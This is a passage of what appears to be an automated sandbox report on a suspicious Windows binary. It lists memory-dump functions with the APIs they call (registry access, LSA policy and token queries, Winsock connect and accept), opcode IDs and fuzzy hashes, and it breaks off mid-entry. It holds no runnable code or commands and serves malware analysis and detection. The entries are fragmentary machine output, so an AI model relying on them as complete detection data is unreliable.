                                                                      • Instruction Fuzzy Hash: 5721A471508384AFDB11CB25CC44F66BFA8EF46310F08849BEE459B252C264A508C761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529443B, Relevance: 1.6, APIs: 1, Instructions: 74libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(?,00000E2C), ref: 052944DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 60df209b486fc0e80b72b8639f0b58cfba22c3818a54dbe50eee21b3ab1dd1b5
                                                                      • Instruction ID: e58ced8a914c9feb4acbd922af2feea65ae73ead291a8bfb621f0df1b7ab7405
                                                                      • Opcode Fuzzy Hash: 60df209b486fc0e80b72b8639f0b58cfba22c3818a54dbe50eee21b3ab1dd1b5
                                                                      • Instruction Fuzzy Hash: F021C8715453846FEB12DB14CC45F66FFA8EF42720F1880DBED845F292D2A4A949C7B1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFAB56, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 02AFABD5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: ad29a025f8273f18f3a3e7d4a7fb0eb77fae0bdaa66403df2c5f64824ed1a88f
                                                                      • Instruction ID: 168bd9bdd3c9c538024995a47c242e6de9a9f062f3646c646cd06e55e6df4f8d
                                                                      • Opcode Fuzzy Hash: ad29a025f8273f18f3a3e7d4a7fb0eb77fae0bdaa66403df2c5f64824ed1a88f
                                                                      • Instruction Fuzzy Hash: C4219D72500704AFE721DB65CC85FABFBECEF04710F14855BFE459A242DA64A8098BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052938C2, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNEL32(?,00000E2C), ref: 05293936
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID:
                                                                      • API String ID: 71445658-0
                                                                      • Opcode ID: 294f3d4e36c5676ba4bb20824373a2e775e80b92128712e88ddd5dfe4277a2c0
                                                                      • Instruction ID: 5d93de58fcfe2515aab187163a8f8eae2fd2bf668f0a53cfe38acc523a3cf179
                                                                      • Opcode Fuzzy Hash: 294f3d4e36c5676ba4bb20824373a2e775e80b92128712e88ddd5dfe4277a2c0
                                                                      • Instruction Fuzzy Hash: 8A219D72500204AFFB20DF25DC85F6BFBA8EF54720F14896AEE859B241D674A8088A71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05290986, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateMutexW.KERNEL32(?,?), ref: 052909F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateMutex
                                                                      • String ID:
                                                                      • API String ID: 1964310414-0
                                                                      • Opcode ID: 9a78f0eca3894180d1fb423b52f2441f26ec2a585886f1ec7504147c4ed1bf8f
                                                                      • Instruction ID: cbcf89d0b488038c1843c7ea81e1a00786f5b60a650327aec3d6bdda4a4573e4
                                                                      • Opcode Fuzzy Hash: 9a78f0eca3894180d1fb423b52f2441f26ec2a585886f1ec7504147c4ed1bf8f
                                                                      • Instruction Fuzzy Hash: 7321AC71500204AFFB24DF65C889F66FBE8EF04610F14846AEE499B342D671E804CA61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052933FE, Relevance: 1.6, APIs: 1, Instructions: 72networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAIoctl.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05293479
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Ioctl
                                                                      • String ID:
                                                                      • API String ID: 3041054344-0
                                                                      • Opcode ID: d5e4e1e2cb71d6713108179072b11c0fb31f23032c83b1b090558fd2fffaf7b0
                                                                      • Instruction ID: e68f68efa64705a4a36db0e9228c5be818f906c4d2ac3d4a264fe44780888ac8
                                                                      • Opcode Fuzzy Hash: d5e4e1e2cb71d6713108179072b11c0fb31f23032c83b1b090558fd2fffaf7b0
                                                                      • Instruction Fuzzy Hash: 24218EB5500604AFEB21CF55CC84FABFBE8EF14710F14896AEE4A8B251D675E809CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFB31E, Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LsaOpenPolicy.ADVAPI32(?,00000E2C), ref: 02AFB38F
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: OpenPolicy
                                                                      • String ID:
                                                                      • API String ID: 2030686058-0
                                                                      • Opcode ID: 892ed21dfdb1574afe71c220379b980069974b9e61baa983b5a48661d2efe6c9
                                                                      • Instruction ID: 3f6f63a411dab11fe62f58963d9e7c60690b5eb93101b6c1cbae05d057f6d00a
                                                                      • Opcode Fuzzy Hash: 892ed21dfdb1574afe71c220379b980069974b9e61baa983b5a48661d2efe6c9
                                                                      • Instruction Fuzzy Hash: 14218E72540304AFEB20DF69DC85F6AFBACEF48710F14896AFE459A641D674A4088B71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05291041, Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ioctlsocket.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 052910BF
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ioctlsocket
                                                                      • String ID:
                                                                      • API String ID: 3577187118-0
                                                                      • Opcode ID: 36f469eeb1edae57798042c9d39596d773988e8208b5b61d78095c5e7ee8f664
                                                                      • Instruction ID: 972e0f885179c2ca07f04686039bbb8138130d973eac5a813772a3c3f7e5687a
                                                                      • Opcode Fuzzy Hash: 36f469eeb1edae57798042c9d39596d773988e8208b5b61d78095c5e7ee8f664
                                                                      • Instruction Fuzzy Hash: FD21A471409384AFDB12CF65DC45F67FFB8EF46310F0884ABEA849B252C275A504C761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFB002, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTokenInformation.KERNELBASE(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 02AFB06C
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationToken
                                                                      • String ID:
                                                                      • API String ID: 4114910276-0
                                                                      • Opcode ID: 9147c8fa6f6f9d990f0891efafeda51e1a87e9b1cff7c5a41034d8b6123346d0
                                                                      • Instruction ID: 9f3ca653ce71085dcf38e1cca95a0f3de5ab23a3517b96acbff3853c23fb7477
                                                                      • Opcode Fuzzy Hash: 9147c8fa6f6f9d990f0891efafeda51e1a87e9b1cff7c5a41034d8b6123346d0
                                                                      • Instruction Fuzzy Hash: 3C11CD71500204AFEB21CF65DC80FABBBACEF08324F14886BEE45DB651DA74A508CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFAC5E, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegQueryValueExW.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 02AFACD8
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: 7df04ed3d09029ba31b2b28e33741c2afa10c59ff054382e85bb3921a6cbdf20
                                                                      • Instruction ID: 03f1d9aeff40900a5825f262387abc8925adb6b4c707545f684df35ae3511334
                                                                      • Opcode Fuzzy Hash: 7df04ed3d09029ba31b2b28e33741c2afa10c59ff054382e85bb3921a6cbdf20
                                                                      • Instruction Fuzzy Hash: 8A218E76600604AFE760CF95CC80FA7FBECEF04710F14846AEA499B252DB64E409CA71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529050A, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OpenFileMappingW.KERNELBASE(?,?), ref: 05290575
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileMappingOpen
                                                                      • String ID:
                                                                      • API String ID: 1680863896-0
                                                                      • Opcode ID: 21ef14b6d5f43d15c788e9d8c44d7bda127378da91a2f762dddabab459000576
                                                                      • Instruction ID: d2364a9d1f1a29e00460621f2804d497f83c37cc08b7d3af3afb6c61a4f49eca
                                                                      • Opcode Fuzzy Hash: 21ef14b6d5f43d15c788e9d8c44d7bda127378da91a2f762dddabab459000576
                                                                      • Instruction Fuzzy Hash: 03219DB1900204EFEB24DB65CC49F66FBE8EF44620F14846AED898B341D6B5A804CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05291142, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: accept
                                                                      • String ID:
                                                                      • API String ID: 3005279540-0
                                                                      • Opcode ID: 92dfe93a5676a380f5ed1225aa2e0f985b56daca6ce2e3d51ddbe3b43c983b17
                                                                      • Instruction ID: 4f3b8fc8439d9e4254ef4efb18fa28fe1335f525ec63a690e45671dfc7327451
                                                                      • Opcode Fuzzy Hash: 92dfe93a5676a380f5ed1225aa2e0f985b56daca6ce2e3d51ddbe3b43c983b17
                                                                      • Instruction Fuzzy Hash: FE21AE70500200AFEB20DF25DC85FA6FBE8EF04720F14846AED889B341D7B1A908CA71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529564D, Relevance: 1.6, APIs: 1, Instructions: 68windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PeekMessageW.USER32(?,?,?,?,?), ref: 052956C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePeek
                                                                      • String ID:
                                                                      • API String ID: 2222842502-0
                                                                      • Opcode ID: baf31862861de75c76cabe7f6efc16b03e89441d71485730a9d77e9eff328f5b
                                                                      • Instruction ID: 2263e00985da0cf147080b8f10a0f3c8b73c7b429e2a73ed61f038e52f56e91f
                                                                      • Opcode Fuzzy Hash: baf31862861de75c76cabe7f6efc16b03e89441d71485730a9d77e9eff328f5b
                                                                      • Instruction Fuzzy Hash: 1321D1765093C0AFDB128F25DC40A62FFB4EF07210F0884DEED858F263D265A808DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052951BA, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • K32GetModuleInformation.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 0529521E
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: InformationModule
                                                                      • String ID:
                                                                      • API String ID: 3425974696-0
                                                                      • Opcode ID: 19e0217b1dc9f814e38c78571c56eeba1ed1f4c894ec7276bee7bd84ff6729f3
                                                                      • Instruction ID: 1beb9a5f54006b4002f5b7264ef827c2a4eada3b2e147e7a7d9ffc7a4a3cadf2
                                                                      • Opcode Fuzzy Hash: 19e0217b1dc9f814e38c78571c56eeba1ed1f4c894ec7276bee7bd84ff6729f3
                                                                      • Instruction Fuzzy Hash: 82119D71A04204AFEB21CB25DC85F6AFBE8EF45710F14846BEE498B251D6A0A8088A71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05293DD2, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05293E4E
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Connect
                                                                      • String ID:
                                                                      • API String ID: 3144859779-0
                                                                      • Opcode ID: 1400b2618fac32a9b0f200696c858f7921dafac88e532d2be4837a1974222d03
                                                                      • Instruction ID: 359aba70303241fc7626a6b78a57a81c054171761bc9d2d2737b9f09cdf4b477
                                                                      • Opcode Fuzzy Hash: 1400b2618fac32a9b0f200696c858f7921dafac88e532d2be4837a1974222d03
                                                                      • Instruction Fuzzy Hash: E3216F71409384AFDB22CF65DC44B62FFF4EF46210F18859EED898B262D375A818DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529060A, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      • Opcode ID: 191e7fec6ccc53cfff8856ceb3c7b41054612b4ff07355309809c8018d64345f
                                                                      • Instruction ID: 23c5ba1d84cc21ca74f89d87b2dbb22157ae505cb89b8f448f2d0e0ab9a8e3a9
                                                                      • Opcode Fuzzy Hash: 191e7fec6ccc53cfff8856ceb3c7b41054612b4ff07355309809c8018d64345f
                                                                      • Instruction Fuzzy Hash: FA21DE71500344AFEB21CF15CC88FA6FBE8EF48320F14845EEA889B251D3B1A408CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFB84E, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSASocketW.WS2_32(?,?,?,?,?), ref: 02AFB8BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Socket
                                                                      • String ID:
                                                                      • API String ID: 38366605-0
                                                                      • Opcode ID: 0e6225c5f32c170156a59ce98f10d8875caa046d3baf16f12bc488ccd17107d2
                                                                      • Instruction ID: 1aafb723edb9cd23a674fb9be76e119f864cf2b56aee6906316ad7b40bb4917f
                                                                      • Opcode Fuzzy Hash: 0e6225c5f32c170156a59ce98f10d8875caa046d3baf16f12bc488ccd17107d2
                                                                      • Instruction Fuzzy Hash: A821BE71500200AFEB21CFA5D885B56FFE8EF48310F14895EEE858A251C7B5A408CBB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052935D2, Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenCurrentUser.KERNEL32(?,00000E2C), ref: 05293635
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CurrentOpenUser
                                                                      • String ID:
                                                                      • API String ID: 1571386571-0
                                                                      • Opcode ID: cf24a775497ae9e39422f220c3a7f5d62fd05e2089afd70980e480bcef88dfb9
                                                                      • Instruction ID: 306c9a92689d3d3e8913c7f6e0a44b88c14fc390053bfa05b25fc6a45b429933
                                                                      • Opcode Fuzzy Hash: cf24a775497ae9e39422f220c3a7f5d62fd05e2089afd70980e480bcef88dfb9
                                                                      • Instruction Fuzzy Hash: BE119071500244AFEB10DF25DC85F6BFF9CEF44720F14886BEE449B341D6B4A9098A75
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052937D6, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegNotifyChangeKeyValue.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05293840
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ChangeNotifyValue
                                                                      • String ID:
                                                                      • API String ID: 3933585183-0
                                                                      • Opcode ID: 2314f70d1c11c787ae7a5c574d700b4946cab83e50fee11afb05debde5fdb7e6
                                                                      • Instruction ID: 9171c10f8c3fbda73921dde7f2e2a7e99aac590b7046a9d5e32cb591a209a072
                                                                      • Opcode Fuzzy Hash: 2314f70d1c11c787ae7a5c574d700b4946cab83e50fee11afb05debde5fdb7e6
                                                                      • Instruction Fuzzy Hash: 2011B171400204AFEB21CF55DC44FA7FBACEF55310F14896BEA459B211D674A508CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05291A6D, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 05291AE9
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoadShim
                                                                      • String ID:
                                                                      • API String ID: 1475914169-0
                                                                      • Opcode ID: a2970d9db6f21bb1fe9daa02ec3b67b8c73e7676621a280518b26245c384c89a
                                                                      • Instruction ID: aae44a2677a3b3e3e450397e128c46c8119e34104484ffb249acb2046a266cc9
                                                                      • Opcode Fuzzy Hash: a2970d9db6f21bb1fe9daa02ec3b67b8c73e7676621a280518b26245c384c89a
                                                                      • Instruction Fuzzy Hash: 582193755093856FDB22CE25DC45B62BFE8FF46610F08808AED858B253D265E918C762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0529026E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegQueryValueExW.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 052902E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: b68010e8adc736d1f8f4de2f4ac3044f85d05de4a559f46bca8ff7005460a9e9
                                                                      • Instruction ID: 6e896311a14a191f5b37ca760733c9db194cfb7d30bbd0964f8559ed63f38ea6
                                                                      • Opcode Fuzzy Hash: b68010e8adc736d1f8f4de2f4ac3044f85d05de4a559f46bca8ff7005460a9e9
                                                                      • Instruction Fuzzy Hash: 65117C72900608AFEB20CF65CC85F67FBE8EF09710F14856AEA499B351D6A4E408CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052950D2, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegSetValueExW.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05295144
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: faa5b23da939670cb1d39c9d2eba032f5809bec2a8f3b50859bdbf5b69da049f
                                                                      • Instruction ID: 36c9ec598af049eb6ac71224924f96a452271223e73cfb7ca25cae99ccd81b94
                                                                      • Opcode Fuzzy Hash: faa5b23da939670cb1d39c9d2eba032f5809bec2a8f3b50859bdbf5b69da049f
                                                                      • Instruction Fuzzy Hash: 35118E72610600AFEB21CE25CC81F67FBA8EF05710F14855AEE4A9B351E6B4E409CA71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05290C56, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessTimes.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290CB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ProcessTimes
                                                                      • String ID:
                                                                      • API String ID: 1995159646-0
                                                                      • Opcode ID: c5a1c3b54974753f4372a67132b8db3d7ac0bf1d4e59ffc59016657f6c47e317
                                                                      • Instruction ID: a08ea2aa7c497ca18b629739caa03205f44b7faaa9cc2c80961eec41b5e5f303
                                                                      • Opcode Fuzzy Hash: c5a1c3b54974753f4372a67132b8db3d7ac0bf1d4e59ffc59016657f6c47e317
                                                                      • Instruction Fuzzy Hash: 8E11D072500204AFEB21CF65DC45F6BFBE8EF45320F14846BEE499B251C6B1A4058BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05294FEA, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • K32EnumProcessModules.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05295046
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EnumModulesProcess
                                                                      • String ID:
                                                                      • API String ID: 1082081703-0
                                                                      • Opcode ID: bb55a9c6d505941c3250207eac54b94770427fb782a8c622b57a23600c751b87
                                                                      • Instruction ID: 67a8c1424d57cf1a86809e226beeb1c4d4f40adafd88b97f741ccfb812542fb2
                                                                      • Opcode Fuzzy Hash: bb55a9c6d505941c3250207eac54b94770427fb782a8c622b57a23600c751b87
                                                                      • Instruction Fuzzy Hash: E611B271600600AFEB21CF65DC85F67FBA8EF45720F14846BEE499B251D6B5A4048BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05291246, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAEventSelect.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 052912AA
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EventSelect
                                                                      • String ID:
                                                                      • API String ID: 31538577-0
                                                                      • Opcode ID: de3f6a1b28e8e85d82751ab8229a1e074a4da11024505120afbeaf398e2ec16e
                                                                      • Instruction ID: 3cfca6e38b082df40b496f124cfab6e0207552f6c2e22b7beb7c31acd44f8153
                                                                      • Opcode Fuzzy Hash: de3f6a1b28e8e85d82751ab8229a1e074a4da11024505120afbeaf398e2ec16e
                                                                      • Instruction Fuzzy Hash: 02119071800204AFEB11DB65DC84FA7FBACEF45320F14846BEA49DB241D674A504CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05290F82, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • getsockname.WS2_32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05290FE3
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getsockname
                                                                      • String ID:
                                                                      • API String ID: 3358416759-0
                                                                      • Opcode ID: 0aa50b40f66f5088010acd65ffda8a7498cec5ac0a2d309413e08e246c292b93
                                                                      • Instruction ID: ccfc3177e050f17a08ffca8b32079b8bc455e01c4e67bc0b068c514cad6784e6
                                                                      • Opcode Fuzzy Hash: 0aa50b40f66f5088010acd65ffda8a7498cec5ac0a2d309413e08e246c292b93
                                                                      • Instruction Fuzzy Hash: FA11BF71500204AFEB20CF25DC85FA7FBE8EF44720F1484ABEE499B241D6B5A508CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFA65A, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(?,0949EA77,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 02AFA6CC
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 84e3592128705565d926a8b4ffecb1d1589000c9b5e0129bbe738630bf2c9bca
                                                                      • Instruction ID: 9a1906aba1a822da6f39976de2b48c73093a6139e22c0fc2916908478c2070c5
                                                                      • Opcode Fuzzy Hash: 84e3592128705565d926a8b4ffecb1d1589000c9b5e0129bbe738630bf2c9bca
                                                                      • Instruction Fuzzy Hash: 28214A714093C46FDB138B259C94662BFB4DF47624F0980DBED858F2A3D2695908D772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 05294996, Relevance: 1.6, APIs: 1, Instructions: 61registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegSetValueExW.KERNEL32(?,00000E2C,0949EA77,00000000,00000000,00000000,00000000), ref: 05294A00
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 26f85ef36edb735b19aa788f80d08be9edea5e09c370d982f9b6f25d8473d209
                                                                      • Instruction ID: a146c648ec87873f814fd4d76469497a90f9fc32096cbc2437d997fea5c7794f
                                                                      • Opcode Fuzzy Hash: 26f85ef36edb735b19aa788f80d08be9edea5e09c370d982f9b6f25d8473d209
                                                                      • Instruction Fuzzy Hash: D2119D72500600AEEF21DF15DC81F67FBA8FF05710F14856AEE4A9A251D6A1A8098BB2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02AFA5AF, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02AFA61A
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.321737733.0000000002AFA000.00000040.00000001.sdmp, Offset: 02AFA000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: b90e50b255380aa6792e259d55eb35e0b2cd5d518f9b11132f8956104f0fb29b
                                                                      • Instruction ID: c8c2c683a290735b4695a30fc1f15c63a108fe3b8dc83988fe5b4eb1b026d0e5
                                                                      • Opcode Fuzzy Hash: b90e50b255380aa6792e259d55eb35e0b2cd5d518f9b11132f8956104f0fb29b
                                                                      • Instruction Fuzzy Hash: C511B471409380AFDB228F50DC44B62FFF4EF4A210F0885DAEE898B263C375A418DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 052955A0, Relevance: 1.6, APIs: 1, Instructions: 60windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 0529560D
                                                                      Memory Dump Source
                                                                      • Source File: 00000005.00000002.325156818.0000000005290000.00000040.00000001.sdmp, Offset: 05290000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
